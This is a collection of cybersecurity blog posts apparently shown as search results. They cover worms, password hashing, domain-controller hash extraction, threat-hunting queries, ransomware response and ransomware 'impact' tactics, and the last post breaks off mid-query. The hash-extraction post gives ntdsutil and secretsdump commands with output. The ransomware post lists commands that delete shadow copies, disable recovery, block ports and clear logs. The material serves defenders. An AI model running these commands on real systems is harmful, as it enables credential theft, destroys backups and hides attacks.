Search Results

In the world of cybersecurity, attackers are always looking for ways to compromise systems efficiently and effectively. One method that has been around for decades, but continues to evolve and cause significant damage, is the use of worms. Worms are a type of malicious software that can spread across networks, infecting multiple systems without the need for direct human intervention. What Are Worms? Worms are automated attack tools designed to spread through networks. Unlike traditional malware that requires some form of user interaction, such as opening a malicious email attachment, worms can propagate themselves. Here’s how they typically work: Initial Infection : A worm infects the first vulnerable system it encounters. Scanning : From the compromised system, the worm scans the network for other vulnerable systems. Replication : The worm then copies itself to those systems, repeating the process and spreading further. Each instance of the worm is called a "segment," and as it moves from system to system, it continues to multiply, often at an exponential rate. The History of Worms Worms have been a part of the cybersecurity landscape for decades. One of the earliest and most famous examples is the Morris Worm, created by Robert Tappan Morris, Jr., in 1988. This worm caused significant disruption to the early internet, highlighting the destructive potential of such self-replicating malware. Even before the Morris Worm, researchers at Xerox PARC were exploring the concept of worms for efficiently distributing software across networked computers, though not with malicious intent. Worm Evolution: Getting More Dangerous Worms have significantly evolved over the years, becoming more sophisticated and harder to defend against. Here are some key developments: Multi-Exploit Worms : Early worms typically exploited a single vulnerability. Modern worms, however, can use multiple exploits to infect systems. For example , the Nimda worm from 2001 used about 12 different exploits, including those targeting web servers, email systems, and file sharing. Conficker, another notorious worm, used three main methods to spread: exploiting a Windows vulnerability, copying itself to USB drives, and guessing passwords for network shares. Multiplatform Worms : Initially, worms targeted a single operating system. However, worms like Stuxnet have demonstrated the ability to affect multiple platforms. Stuxnet was primarily aimed at Windows systems but also manipulated industrial control systems, showcasing a significant leap in worm capabilities. Zero-Day Exploit Worms : Zero-day exploits are vulnerabilities that are unknown to the software vendor and the security community at the time of the attack. Worms using zero-day exploits are particularly dangerous because there are no existing patches or defenses against them when they first appear. Stuxnet, for instance, utilized four zero-day exploits, making it extremely difficult to defend against initially. The Threat of Worm Evolution As worms continue to evolve, we need to prepare for even more sophisticated variants. Future worms may: Use multiple exploits across different platforms : This makes patching systems more complex, as organizations need to address vulnerabilities across various operating systems simultaneously. Spread rapidly using zero-day exploits : With no patches available initially, these worms can cause widespread damage before security teams have a chance to respond. Conclusion Worms represent a significant threat in the cybersecurity landscape, continually evolving to become more destructive and harder to defend against. By understanding their behavior and preparing robust defense mechanisms, we can mitigate the risk they pose. Staying vigilant and proactive is key to protecting our networks from these automated and relentless attackers. Akash Patel

In the early days of UNIX and Linux systems, passwords were stored using the DES encryption algorithm, often without the use of a salt. Usernames and passwords were kept in the /etc/passwd file, which was readable by all users. This practice posed a security risk as the passwords were relatively easy to access and crack. Improvements in Password Storage Transition to MD5 and Beyond As security concerns grew, UNIX and Linux systems moved towards stronger hashing algorithms and better storage practices. Passwords began to be hashed using MD5, and later algorithms such as Blowfish, SHA-256, and SHA-512. Along with the stronger algorithms, the use of salt became standard practice. Initially, salts were 4 bytes long, but later expanded to 8 bytes. To improve security further, password hashes were moved to the /etc/shadow file, which has restrictive permissions and is only readable by the root user. Meanwhile, the /etc/passwd file remained world-readable but did not contain sensitive hash data. Password Hashing in /etc/shadow In modern UNIX and Linux systems, the /etc/shadow file contains password hashes in a format that includes the hash type, the salt, and the hashed password, separated by dollar signs ($). The structure is as follows: username:$id$salt$hashed_password $1$ indicates MD5 hashing. $2$ indicates Blowfish hashing. $5$ indicates SHA-256 hashing. $6$ indicates SHA-512 hashing. For example: sec504:$6$1ArFQuUx$qhCcp4hKJvWxf47bm30iFs3CldfvKy/z28wN24GuOwBfcgOF8j2iYgl15eFPyMQ0HzE.PyXrIqE3FpnF4vdPq. This entry shows a SHA-512 hash ($6$), with an 8-byte salt (1ArFQuUx) and the resulting hashed password. Enhancing Password Security Multiple Rounds of Hashing To thwart password-cracking attempts, modern hashing algorithms often use multiple rounds of hashing. For instance: MD5 crypt ($1$) uses 1,000 rounds. SHA-256 ($5$) and SHA-512 ($6$) use 5,000 rounds by default. Multiple rounds slow down the hashing process, making it computationally expensive for attackers to crack passwords using brute force or dictionary attacks. GPU-based Attacks Attackers have adapted by utilizing GPUs to speed up the password-cracking process. GPUs can perform many parallel computations, significantly increasing the number of hashes that can be computed per second. For example, an NVIDIA GeForce RTX 2070 can compute around 768,500 SHA-512 hashes per second. Mitigating Advanced Cracking Techniques To counter GPU-based attacks, more sophisticated hashing algorithms have been developed: PBKDF2 (Password-Based Key Derivation Function 2) : Uses a flexible number of hashing rounds, typically in the thousands or millions. Bcrypt : Incorporates a memory-intensive hashing process, which is difficult for GPUs to optimize. Scrypt : Requires even more memory, making it particularly resistant to GPU-based attacks. Argon2 : The winner of the Password Hashing Competition, designed to be memory-hard and resistant to GPU attacks. Conclusion As attackers become more sophisticated, so too must the mechanisms for securing passwords. Modern UNIX and Linux systems use advanced hashing techniques to ensure that password storage remains as secure as possible. Akash Patel

Gaining access to Windows Domain Controller password hashes is a critical step for attackers aiming to compromise a Windows network. Step 1: Obtain NTDS.dit and SYSTEM Registry Hive Data NTDS.dit  is the database that stores Active Directory (AD) data, including password hashes. To extract these hashes, attackers also need the SYSTEM  registry hive, which contains the keys necessary to decrypt the NTDS.dit file. Using ntdsutil.exe Access ntdsutil.exe : This built-in utility is used to manage AD data, including creating backups. Activate Instance : Set the active instance to "ntds". Create Backup : C:\Users\Administrator> ntdsutil ntdsutil: activate instance ntds Active instance set to "ntds". ntdsutil: ifm ifm: create full c:\ntds This sequence of commands creates a full backup of the AD data in the c:\ntds directory, including the NTDS.dit file and the SYSTEM registry hive. Step 2: Extracting Password Hashes After obtaining the NTDS.dit and SYSTEM files, the next step is to decrypt the NTDS.dit data and extract the password hashes. Using secretsdump.py from Impacket Install Impacket : Ensure that Impacket is installed on the attacker’s machine. Run secretsdump.py: This s c ript reads and decrypts the NTDS.dit file using the SYSTEM registry hive. Command for secretsdump.py: python /usr/share/doc/python-impacket/examples/secretsdump.py -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL Output will display the decrypted Hashes: [*]Target system bootKey: 0x7b1c658edfb752594c688e02d4424924 [*] Dumping Domain Credentials (domain\uid: rid: lmhash:nthash) [*] Searching for pekList, be patient. [*] Pek found and decrypted: 0x1e0d9fa12fb2367f15f22517aa31e84d [*] Reading and decrypting hashes from Active Directory/ntds.dit Administrator: 500:aad3b435b51404eeaad3b435b51404ee:9491b24e8c931559455ed4f59476cec2::: Guest: 501:aad3b435b51404eeaad3b435b51404ee:31d2f4f1a07e9fb731e455e0b9a58265::: ksmith: 1000:aad3b435b51404eeaad3b435b51404ee:0d4fa3ed8f51a0d45a7c7fbd0c92b99c::: Minimizing Detection Attackers prefer using built-in tools like ntdsutil because they are less likely to trigger security alerts compared to third-party tools. The built-in utilities are designed for system management and backups, thus their usage might not immediately raise suspicion. Alternative Methods There are other methods to obtain and extract NTDS.dit and SYSTEM data, such as using volume shadow copies or other administrative tools. Detailed methodologies and advanced techniques can be found in various penetration testing blogs and resources, such as the articles by @netbiosX on PentestLab . Conclusion Obtaining and decrypting Windows Domain Controller password hashes involves using built-in utilities to create backups of the necessary files and then employing scripts like secretsdump.py to extract the hashes. Understanding these methods highlights the importance of securing administrative access and monitoring the use of system utilities to prevent unauthorized access to sensitive data. We will continue this in next post............................................................ Akash Patel

In the ever-evolving landscape of cybersecurity, forensic investigators must be equipped with a diverse set of tools and techniques to identify, analyze, and respond to various threats. This blog delves into several advanced methods for detecting malicious activity, focusing on Sysmon Event ID 1, RDP activity hunting, phishing and maldoc detection, and data exfiltration using the $USNJRL.$J file. 1. Sysmon Event ID 1: Process Creation Sysmon (System Monitor) is a powerful tool that provides detailed information on process creation, network connections, and changes to file creation time, among other data. Sysmon logs, particularly Event ID 1, are invaluable for forensic investigators. Why Sysmon Event ID 1? Comprehensive Process Tracking : Every time a process is created, Sysmon logs the event, capturing crucial details such as the process name, command line, and parent process. Enhanced Visibility : Even if you lack Shimcache or SRUM data, Sysmon’s Event ID 1 can fill the gap by logging all process executions, giving you insight into potential malicious activity. Example Query : To identify potentially malicious processes executed via Office applications (common in phishing attacks), you can use the following query: (source_name:"Microsoft-Windows-Sysmon" AND event_id:1) AND process_parent_path:(*winword.exe OR excel.exe OR powerpnt.exe OR mspub.exe OR visio.exe) 2. Hunting RDP Activity: Remote Logon Events Remote Desktop Protocol (RDP) is a common vector for unauthorized access. Monitoring RDP activities is crucial for identifying potential intrusions. Focus on Logon Events Event ID 4624 : This event logs successful logons , which can be filtered to focus on remote logons (Type 10) with RDP connectivity . IP Address Filtering : Investigate events where the source IP address is external (i.e., not within the local 10.0.0.0/8 range or localhost 127.0.0.1). 3. Identifying Infection Vectors: Phishing and Maldoc Hunting Phishing remains a prevalent attack vector, often delivering malicious documents (maldocs) that execute harmful payloads. Detecting Phishing and Maldocs Office Applications as Parent Processes : When malware is executed via Office applications like Word or Excel , it’s often a sign of phishing. Example Query : (source_name:"Microsoft-Windows-Sysmon" AND event_id:1) AND process_parent_path:(*winword.exe OR excel.exe OR powerpnt.exe OR mspub.exe OR visio.exe) ZIP Files Accessed in Windows : ZIP files are commonly used to deliver malicious payloads in phishing emails. Detecting ZIP files opened from temporary locations can indicate phishing activity. Example Query : (source_name:"Microsoft-Windows-Sysmon" AND event_id:1) AND process_parent_command_line:"appdata\\local\\temp\\temp1_*" AND process_parent_command_line.keyword:*temp1_* 4. Data Exfiltration Detection: $USNJRL.$J and ZIP Files One of the key challenges in forensic investigations is detecting data exfiltration . Attackers often compress data into ZIP files before exfiltration . The $USNJRL.$J (Update Sequence Number Journal) file in NTFS can be a goldmine for detecting such activity. Using MFTECmd to Analyze $USNJRL.$J Identifying ZIP Files : By parsing the $USNJRL.$J file , you can identify ZIP files created or modified on the system. Example PowerShell Command : $usnzip = Import-Csv -Path 'C:\Users\noransom\Desktop\.csv' | ? Extension -eq '.zip' Detecting Deleted ZIP Files : Attackers might delete ZIP files after exfiltration to cover their tracks. However, traces remain in the $USNJRL.$J file. Example PowerShell Command : $deleted = $usnzip | ? UpdateReasons -like '*Delete*' $deleted | Format-Table -Property Extension,Name,ParentPath,UpdateReasons -AutoSize 5. Additional Techniques for Enhanced Threat Hunting Credential Reads : Event ID 5379 logs when stored credentials are accessed. Monitoring this event can reveal unauthorized access to sensitive information. Example Query : source_name:"Microsoft-Windows-Security-Auditing" AND event_id:5379 AND credentials_read:Microsoft_Windows_Shell_ZipFolder* Outlook Content and Downloads : Detecting file creations within the Outlook cache path can uncover attempts to download and execute malicious attachments. Example Query : (source_name:"Microsoft-Windows-Sysmon" AND event_id:11) AND file_name:"microsoft\\windows\\inetcache\\content.outlook\\*" Reviewing the Trust Center : Microsoft Office applications maintain a Trusted Documents list, which can be used to detect when a user has marked a malicious document as trusted. Example Query : (source_name:"Microsoft-Windows-Sysmon" AND event_id:13) AND registry_key_path:("Trusted Documents" OR "TrustRecords") Conclusion By leveraging the tools and techniques outlined in this blog, forensic investigators can enhance their ability to detect and respond to sophisticated threats. Whether it's hunting for signs of RDP activity, identifying phishing attempts, or detecting data exfiltration, these methods provide a robust foundation for effective threat hunting and incident response. Akash Patel

Ransomware attacks are among the most devastating incidents an organization can face. They can cripple your operations, lead to significant financial loss, and damage your reputation. When a ransomware campaign is in progress, the clock is ticking, and how you respond in those critical moments can determine the extent of the damage. Immediate Response: The Clock Is Ticking The first thing to understand is that ransomware incidents require immediate action. The sooner you detect the ransomware actor in your network, the better your chances of minimizing damage. Here are the possible scenarios: Immediate Detection Upon Network Access: GREAT!  Work fast! This is the best-case scenario where you can potentially stop the attack before it causes significant harm. Detection After They’ve Been in Your Network for a While: Work faster!  At this point, the attacker may have already exfiltrated data or planted the encryption payload. Time is of the essence. Detection Pre- or Post-Exfiltration, But Before Encryption: If you catch them in this window, you still have a chance to prevent encryption. However, be prepared for the possibility that encryption is imminent. Detection After Encryption: Sadly, this is the most common scenario.  At this stage, the focus shifts to damage control and recovery. In all these scenarios, having a pre-incident response plan is crucial. Without it, your response will be too slow, leading to greater damage. Initial Incident Scoping: Key Considerations When you first identify a ransomware incident, you need to quickly assess the situation. Here's what to consider: How was the incident identified? Did someone notify you? Did you discover a ransom note or a service that stopped functioning? Which hosts and services are impacted? Identify all the systems that have been compromised to understand the scope of the attack. What actions have already been taken? Determine if any containment measures have been initiated and whether they were effective. What are the organization’s expectations? Communicate with leadership to understand their priorities and what they expect from the incident response. What are the “crown jewels” of the organization? Identify critical assets that need immediate protection. Do backups exist, and are they unencrypted? Confirm the availability and integrity of backups, as they will be key to recovery. Do up-to-date network diagrams exist? Accurate network diagrams are essential for understanding how the attack is spreading and for planning your response. Is there an MSSP (Managed Security Service Provider) who can assist? If available, leverage external expertise to enhance your response efforts. Collecting and Preserving Evidence Evidence preservation is critical in a ransomware investigation. Here’s how to approach it: Physical Evidence: Take a physical picture of the ransom note immediately, as it might be encrypted or deleted later. Virtual Machines: If possible, pause virtual machines rather than shutting them down. Pausing a VM typically saves its memory state, which can be valuable for investigation. Memory Capture: Capture a memory image from compromised systems to analyze for forensic evidence. Backup Protocols: Review and Invoke When ransomware hits, you may lose access to critical protocols needed for response. Here’s what to do: Active Directory (AD) Availability: Be prepared for AD to be down, which is common in ransomware cases. Have alternative methods to navigate the network and access machines. Local Accounts and Cached Domain Credentials: Ensure that machines have local accounts or cached credentials to maintain access. Deployment Methods for Data Collection: If you need to install tools for data collection, ensure you have a deployment method available. Out-of-Band Communication: Establish secure communication channels that are not dependent on the compromised network. Securing Backups: Protecting the Crown Jewels Your backup servers must be secured immediately: On-Prem Backup: Disconnect from the network to prevent ransomware from spreading to backups. Cloud-Based Backup: Consider disconnecting, depending on the situation, to protect your data. “Going Dark” – Cutting Internet Access If the threat actor is still active in your environment and you suspect imminent encryption, you may need to cut internet access: Major Decision with Far-Reaching Consequences: This decision is not to be taken lightly and should be made by top leadership. While it might prevent encryption, it will disrupt business operations. Pre-Plan Policies: Ensure you have pre-planned policies in place for such scenarios. Create pinholes for essential services like VPN, EDR, and remote IR connectivity. Disabling Shares, Sync Agents, and Accounts Admin Shares: Disabling admin shares can thwart threat actors but may disrupt services. Conduct a risk analysis beforehand. Network Shares and Distributed File Systems: Consider taking these down to protect them from encryption. Credential Remediation: Reset credentials and disable accounts to prevent the threat actor from regaining access. Recovery from Backup Recovering from backups is a critical step, but timing is everything: Hold Off Restoral Until You’re Sure: Ensure you know the exact date(s) to fall back to for recovery. Restoring from a compromised backup could reinfect your network. Edge Devices: Firewalls and VPNs may have been exploited. Consider updating and restoring them to factory state to eliminate persistence mechanisms. Post-Incident: Turning a Crisis into an Opportunity A ransomware attack, while devastating, can also be an opportunity for your security team to gain the attention and support it needs: Increased Support and Funding: Use the incident as leverage to secure more resources for your security team. Staff Augmentation: Advocate for additional staffing to prevent future incidents. Final Thoughts: Learn, Plan, and Prepare Ransomware incidents are complex and require swift, decisive action. Preparation is key. Learn from each incident, refine your response plans, and ensure that your organization is better prepared for the next attack. Akash patel

Ransomware attacks have become increasingly sophisticated, and the “Impact” phase represents the final, most destructive part of the attack campaign. During this phase, after threat actors have achieved their initial objectives, including data exfiltration, they may deploy a ransomware cryptor to encrypt your data. To maximize their leverage, these actors often tamper with your backup and recovery mechanisms, aiming to make recovery difficult and squeeze you into paying the ransom. Securing Your Backup Systems Your backups are one of the most critical assets to secure in your organization. Threat actors often target backup servers to disable or delete backups before deploying ransomware . Here are some essential steps to secure your backups: Monitor All Logins to Backup Servers : Ensure that every login attempt to your backup servers is monitored and logged. This includes successful logins as well as failed attempts. Implement the Principle of Least Privilege : Only designated accounts should have the necessary permissions to access and perform administrative actions on backup servers. Restrict access as much as possible to minimize the attack surface. Scanning for Backup Services : Ransomware affiliates frequently scan for backup services by checking for open ports on well-known systems. To prevent this: Review Documentation : Refer to your backup system’s documentation to understand which ports are used for various services. Set Up Alerts : Monitor these ports and set up alerts for any suspicious activity. Volume Shadow Copy Service (VSS) Many organizations rely on Microsoft’s Volume Shadow Copy Service (VSS) for backups. While VSS can be a convenient way to back up critical files, it can also pose a security risk. VSS keeps copies of essential system files, such as registry hives, in an unlocked state, making them vulnerable to threat actors. Commands Used to Delete Shadow Copies : Ransomware operators may use the following commands to delete VSS shadow copies, thereby eliminating one of your recovery options: vssadmin.exe delete Shadows /all /quiet wmic shadowcopy delete /nointeractive Get-WmiObject Win32_ShadowCopy | % { $_.Delete() } Get-WmiObject Win32_ShadowCopy | Remove-WmiObject Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_Delete(); } Get-CimInstance Win32_ShadowCopy | Remove-CimInstance By deleting these shadow copies, the attackers remove a significant recovery option, making it crucial to protect and monitor VSS on your systems. Tampering with Recovery Mechanisms Threat actors often disable built-in recovery components using native tools, making it difficult for organizations to recover from an attack. They may use tools like bcdedit , which manipulates Boot Configuration Data (BCD) settings , or wbadmin , which configures settings for Windows Backup. Commands Used to Disable Recovery Mechanisms : bcdedit /set {default} recoveryenabled no bcdedit /set {default} bootstatuspolicy ignoreallfailures wbadmin delete catalog –quiet wbadmin delete systemstatebackup -keepversions:0 Preventing IT Response In addition to tampering with backup and recovery mechanisms, threat actors may also prevent IT teams from responding to the attack by weaponizing security mechanisms. They may disable Remote Desktop Protocol (RDP) or block inbound connectivity via Windows Firewall. Common Commands Used : Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled True New-NetFirewallRule -DisplayName "Block PORTS1" -Direction Inbound -LocalPort 80 -Protocol TCP -Action Block New-NetFirewallRule -DisplayName "Block PORTS2" -Direction Inbound -LocalPort 443 -Protocol TCP -Action Block netsh advfirewall set currentprofile state on netsh advfirewall set allprofiles state on netsh advfirewall firewall add rule name="Block PORTS6" protocol=TCP dir=in localport=80 action=block netsh advfirewall firewall add rule name="Block PORTS7" protocol=TCP dir=in localport=443 action=block These measures make it extremely difficult for IT teams to access affected hosts and respond to the threat, emphasizing the need for robust monitoring and proactive defense mechanisms. Clearing Windows Event Logs Threat actors often clear Windows Event Logs to cover their tracks. Unfortunately, this is a simple task in Windows, especially if logs are not being forwarded to a SIEM, log aggregator, or syslog server. The command Clear-EventLog is commonly used for this purpose. Commands to Clear Event Logs : Get-EventLog -LogName Security | Clear-EventLog Clear-EventLog -LogName Application, Security, System Clearing event logs can make post-incident analysis extremely difficult, highlighting the importance of having log forwarding in place. Payload Deployment Methods Ransomware payloads are often deployed via Group Policy Objects (GPOs). Unfortunately, many organizations do not audit GPO deployment, and admin accounts are often overprivileged. This lack of oversight can allow threat actors to create and deploy GPOs without constraint, leading to widespread ransomware deployment across a domain or forest. Threat actors may also use existing deployment methods such as SCCM, PDQ, or SolarWinds to deliver ransomware payloads. In addition, they commonly use native Windows tools like PSExec, WMIC, and BITS to execute processes remotely . Background Intelligent Transfer Service (BITS) : BITS is a Windows service that transfers data in the background, often used by Microsoft to download updates . It’s an intelligent service that minimizes impact on user experience by managing bandwidth effectively. However, threat actors can exploit BITS to transfer malicious payloads. Detection Methods : EDR, Event IDs 4688/4689 | Sysmon IDs 1/5 : Monitor for bitsadmin.exe and review PowerShell logs for related cmdlets. Event ID 7036 : Monitor for service state changes in the System log. Event ID 60 : BITS has stopped transferring a file. Look for temporary files named BITFxxxx.tmp created in the target transfer directory. Example Using Sysmon Event ID 11 : Monitor file creation events for BITS temporary files. file_path.keyword:/.*\\BITF[0-9]+\.tmp/ Encryption Key Usage in Ransomware Modern ransomware typically uses asymmetric key encryption, also known as public key cryptography. The public key, embedded within the ransomware payload, encrypts the victim's data. The private key, which is necessary for decryption, remains with the attacker, and victims must pay the ransom to obtain it. File Write Methods: Overwrite vs. Copy/Delete Ransomware payloads use two general file write methods: Overwrite/Rename:  Opens the original file, replaces its contents with encrypted data, and renames the file. Copy/Delete:  Creates a new file with encrypted data, then deletes the original file. From a forensic perspective, the Overwrite/Rename method might leave evidence in the $UsnJrnl or $LogFile , while the Copy/Delete method might allow recovery of "deleted" files from unallocated disk space using tools like Bulk Extractor and PhotoRec. I already have a blog recoverying evidence using Photorec do check it out: https://www.cyberengage.org/post/digital-evidence-techniques-for-data-recovery-and-analysis Detecting Encryption and Ransom Notes Monitoring for file creation events using Sysmon/EDR can help detect ransomware activity. Sysmon Event ID 2, for instance, logs file creation time changes, which can be indicative of ransomware encryption. To understand how a specific ransomware payload encrypts files, reverse engineers and malware analysts often disassemble or decompile the ransomware's code using tools like IDA Pro and Ghidra. Detailed write-ups on ransomware samples are valuable resources for incident response. The VX-Underground team maintains extensive collections of malware samples, including ransomware families, which can be instrumental for analysis. https://for528.com/vxug-samples The team also maintains an archive with various builders, including ransomware builders! https://vx-underground.org/ Importance of Backing Up Encrypted Files Backing up encrypted files is crucial because: Partially Encrypted Files:  May still contain recoverable data. Future Decryption Possibilities:  Decryption keys or tools may become available in the future. If using a decryptor, exercise caution. Some decryptors may be flawed, ineffective, or even malicious. Always perform malware analysis on any decryptor before use. Free decryptors for some ransomware variants are available at No More Ransom’s site, which also offers the “Crypto Sheriff” tool for identifying ransomware strains and checking for available decryption resources. https://www.nomoreransom.org/en/decryption-tools.html https://www.nomoreransom.org/crypto-sheriff.php?lang=en Efficiency Issues with Decryptors Decryptors, even those provided by attackers after paying the ransom, are not always efficient. They may be slow, non-multithreaded, or otherwise poorly designed . For example, the decryptor provided by DarkSide ransomware during the Colonial Pipeline attack was notoriously slow, leading responders to develop a custom tool using the provided decryption key. Remember:  Always back up encrypted data before attempting decryption to avoid potential data loss. Conclusion By understanding the methodologies and tactics employed during the "Impact" phase of a ransomware attack, organizations can better prepare their defenses, respond more effectively, and mitigate the risks associated with these increasingly sophisticated threats. Akash Patel

When it comes to detecting malicious activity and potential security threats, analyzing the right data sources is crucial. Whether you are working with SIEM tools, conducting threat hunting, or performing forensic analysis, the following queries can be invaluable. The logic behind these queries remains consistent, though the format may need to be adjusted based on the platform you are using, such as Timesketch, Kibana, or other log management systems. 1. Detecting System Configuration and Host Information CurrentControlSet This query extracts information about the CurrentControlSet, which can help in understanding the system's boot configuration. Query: parser:winreg AND key_path:"HKEY_LOCAL_MACHINE\\System\\Select*" Host Network Interfaces Identify network interfaces configured on the host to monitor network-related configurations and potential unauthorized changes. Query: parser:winreg AND key_path:"*Parameters\\Interfaces*" Hostname Retrieve the hostname of the system, which can be used for identification in multi-host environments. Query: parser:winreg AND key_path:"*Control\\ComputerName\\ComputerName*" Network Shares Monitor network shares on the host, which can reveal potentially exposed resources or unauthorized access. Query: parser:winreg AND key_path:"*Lanmanserver\\Shares*" AND NOT message:*empty* Software-SysInternals Tool Usage Indicator Detect usage of SysInternals tools, which are often used by both administrators and attackers. This query checks for evidence that the tools have been executed. Query: parser:"winreg" AND key_path:"*Software\\Sysinternals\\*" AND values:"*EulaAccepted*" 2. Monitoring Remote Desktop Protocol (RDP) Activity T1021.001 - AV Scanning Disabled for Attachments This query identifies registry modifications related to the disabling of antivirus scanning for RDP attachments. Query: parser:winreg AND (key_path:"*Microsoft\\Terminal Server Client\\Default*" OR key_path:"*Microsoft\\Terminal Server Client\\Servers*") T1021.001 - RDP Activity Ended Monitor for events that indicate the end of an RDP session, which could signify the end of a potential unauthorized access. Query: (parser:"winevtx" AND source_name:"Microsoft-Windows-TerminalServices-LocalSessionManager" AND ((event_identifier:24 AND NOT xml_string:"*Address>LOCAL*") OR event_identifier:39 OR event_identifier:40 OR event_identifier:23)) OR (parser:"winevtx" AND source_name:"Microsoft-Windows-Security-Auditing" AND event_identifier:4779) T1021.001 - RDP Activity Started Detect when an RDP session starts, focusing on non-local connections that may indicate remote access attempts. Query: (parser:"winevtx" AND source_name:"Microsoft-Windows-TerminalServices-LocalSessionManager" AND ((event_identifier:21 AND NOT xml_string:"*Address>LOCAL*") OR (event_identifier:22 AND NOT xml_string:"*Address>LOCAL*") OR (event_identifier:25 AND NOT xml_string:"*Address>LOCAL*"))) OR (parser:"winevtx" AND source_name:"Microsoft-Windows-Security-Auditing" AND event_identifier:4624 AND xml_string:"*LogonType\">10*") OR (parser:"winevtx" AND source_name:"Microsoft-Windows-Security-Auditing" AND event_identifier:4778) 3. Identifying Potential Lateral Movement T1021.002 - Potential SMB Lateral Movement (Source) Track SMB connections that might indicate lateral movement attempts, particularly focusing on connections over port 445. Query: parser:winevtx AND source_name:"Microsoft-Windows-Security-Auditing" AND event_identifier:4648 AND xml_string:"*IpPort\">445*" 4. Monitoring Task and Script Execution T1053.005 - Scheduled Tasks Scheduled tasks can be used by attackers to persist on a system. This query helps detect such tasks, excluding common Microsoft tasks. Query: parser:winreg AND key_path:"*CurrentVersion\\Schedule\\TaskCache\\Tree*" AND NOT key_path:"*CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft*" AND NOT message:"*SD: [REG_BINARY] (220 bytes)*" T1059 - PowerShell Web Request Detect the use of PowerShell for web requests, which is a common technique in fileless malware attacks. Query: parser:"winevtx" AND (event_identifier:"4104" OR event_identifier:"4688" OR event_identifier:"1") AND (message:"*Invoke-WebRequest*" OR message:"*iwr*" OR message:"*wget*" OR message:"*curl*" OR message:"*Net.WebClient*" OR message:"*Start-BitsTransfer*") T1059.001 - PowerShell Configuration Monitor changes to PowerShell settings, which might indicate an attacker attempting to modify execution policies or script logging. Query: parser:"winreg" AND key_path:"*Microsoft\\PowerShell*" AND (message:*EnableScript* OR message:*ExecutionPolicy* OR message:*EnableModuleLogging*) 5. Security Monitoring and Defense Evasion T1070.001 - Windows Log Cleared This query detects the clearing of Windows event logs, a common technique used by attackers to cover their tracks. Query: parser:"winevtx" AND source_name:"Microsoft-Windows-Eventlog" AND event_identifier:"1102" T1078 - Windows Account Activity Monitor for changes in user accounts, such as enabling, disabling, or modifying permissions. Query: parser:"winevtx" AND (event_identifier:"4722" OR event_identifier:"4724" OR event_identifier:"4728" OR event_identifier:"4634" OR event_identifier:"4672" OR event_identifier:"4733") T1078.003 - Query for a Blank Password for An Account Detect attempts to query or check for blank passwords on accounts, which may indicate password-guessing attacks. Query: parser:"winevtx" AND event_identifier:"4797" 6. Detecting Suspicious Network Activity and Proxy Configurations T1090 - Proxy Config Identify modifications to proxy settings, which may indicate the presence of proxy-aware malware or unauthorized network changes. Query: parser:"winreg" AND key_path:"HKEY_LOCAL_MACHINE\\Software\\*\\Microsoft\\Windows\\CurrentVersion\\Internet Settings*" AND (values:*AutoDetect* OR values:*ProxyServer* OR values:*ProxyOverride* OR values:*ProxyEnable*) T1110 - SQL Server Failure Monitor SQL Server authentication failures, which may indicate brute-force or dictionary attacks. Query: parser:winevtx AND display_name:"*Logs\\Application\.evtx" AND event_identifier:"18456" T1110 - Suspicious Logon Failures Track multiple failed login attempts across different accounts, which may be indicative of password spraying or brute force attacks. Query: parser:"winevtx" AND source_name:"Microsoft-Windows-Security-Auditing" AND (event_identifier:"4625" OR event_identifier:"4767" OR event_identifier:"4740" OR event_identifier:"4776") T1197-Suspicious BitsTransfer Activity Query: parser:"winevtx" AND source_name:"Microsoft-Windows-Bits-Client" AND event_identifier:"59" AND (strings:"*\.ps1*" OR strings:"*\.bat*" OR strings:"*\.exe*" OR strings:"*\.dll*" OR strings:"*\.zip*" OR strings:"*\.rar*" OR strings:"*\.7z*" OR strings:"*\.tar*") T1204-Execution Query: (parser:"winreg" AND (key_path:"*Microsoft\\Windows\\ShellNoRoam\\MUICache*" OR key_path:"*Software\\Microsoft\\Windows\\Shell\\MUICache*")) OR parser:"prefetch" OR (parser:"winevtx" AND event_identifier:"4688") OR (parser:"winreg" AND key_path:"*LastVisitedPidlMRU*") OR (parser:"winreg" AND key_path:"*LastVisitedMRU*") OR (parser:"winevtx" AND source_name:"Microsoft-Windows-Application-Experience" AND event_identifier:"500") T1204-Execution of a Binary via BAM Query: parser:"bam" AND binary_path:*exe T1204-Execution or Existence of a File Query: parser:"appcompatcache" AND (path:*exe* OR path:*cpl* OR path:*ps1* OR path:*msi* OR path:*dll* OR path:*bat*) T1204-User Execution or Shortcut Query: parser:"userassist" AND (value_name:*lnk* OR value_name:*exe*) T1543-Installation or Execution of a Windows Service Query: parser:"winevtx" AND (event_identifier:"7045" OR event_identifier:"4697") AND NOT message:"*svchost.exe -k*" T1546.003-WMI CommandLine Consumer Query: tag:Execution AND message:*wmiprvse* T1547.001-Windows Autorun Query: parser:"windows_run" AND (message:*exe* OR message:*.dll* OR message:*.bat* OR message:*.ps1*) T1548.002-UAC Disabled in Registry Query: parser:"winreg" AND key_path:"*Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA" AND message:"*DisplayType: [REG_DWORD_LE] 0*" T1560 or T1083-File Save or Discovery Query: parser:"winreg" AND key_path:*OpenSave*MRU* AND message:*Shell* T1560.001-Archived Files Query: (data_type:"windows:lnk:link" OR data_type:"windows:shell_item:file_entry" OR data_type:"olecf:dest_list:entry" OR data_type:"windows:registry:mrulistex") AND (message:*.zip* OR message:*.7z* OR message:*.tar.gz* OR message:*.tar* OR message:*.gz*) T1562.001-Win Defender Disabled Query: parser:"winevtx" AND source_name:"Microsoft-Windows-Windows Defender" AND (event_identifier:"5001" OR event_identifier:"5010" OR event_identifier:"5012") T1562.001-Windows Defender Disabled Registry Key Query: parser:"winreg" AND key_path:"*Microsoft\\Windows Defender*" AND (values:"*DisableRealtimeMonitoring: \[REG_DWORD_LE\] 1*" OR values:"*DisableAntiSpyware: \[REG_DWORD_LE\] 1*" OR values:"*DisableAntiVirus: \[REG_DWORD_LE\] 1*" OR values:"*DisableBehaviorMonitoring: \[REG_DWORD_LE\] 1*" OR values:"*DisableIOAVProtection: \[REG_DWORD_LE\] 1*" OR values:"*DisableOnAccessProtection: \[REG_DWORD_LE\] 1*" OR values:"*DisableScanOnRealtimeEnable: \[REG_DWORD_LE\] 1*" OR values:"*DisableEnhancedNotifications: \[REG_DWORD_LE\] 1*" OR values:"*DisableBlockAtFirstSeen: \[REG_DWORD_LE\] 1*") T1562.001-Windows Defender Disabled via PS Query: parser:"winevtx" AND 